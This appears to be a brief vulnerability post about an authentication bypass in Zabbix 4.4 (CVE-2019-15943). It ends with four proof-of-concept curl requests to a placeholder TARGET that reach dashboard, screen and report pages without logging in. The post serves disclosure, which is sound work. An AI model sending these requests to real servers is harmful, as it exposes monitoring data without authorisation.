Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines (VMs) and cloud services. Zabbix provides monitoring metrics, among others network utilization, CPU load and disk space consumption.
Security researcher Todor Donev has been found in the popular system monitoring application Zabbix. Enabling a third party to bypass authentication. Zabbix is a very popular monitoring software for monitoring availability for computer hosts, Most commonly used by internet service providers and software companies. The vulnerability has found in Zabbix 4.4. The vulnerability has been given the CVE of CVE-2019-15943.
Proof of concept
curl -i https://TARGET/zabbix/zabbix.php?action=dashboard.list
curl -i https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
curl -i https://TARGET/zabbix/screens.php?ddreset=1
curl -i https://TARGET/zabbix/report2.php?ddreset=1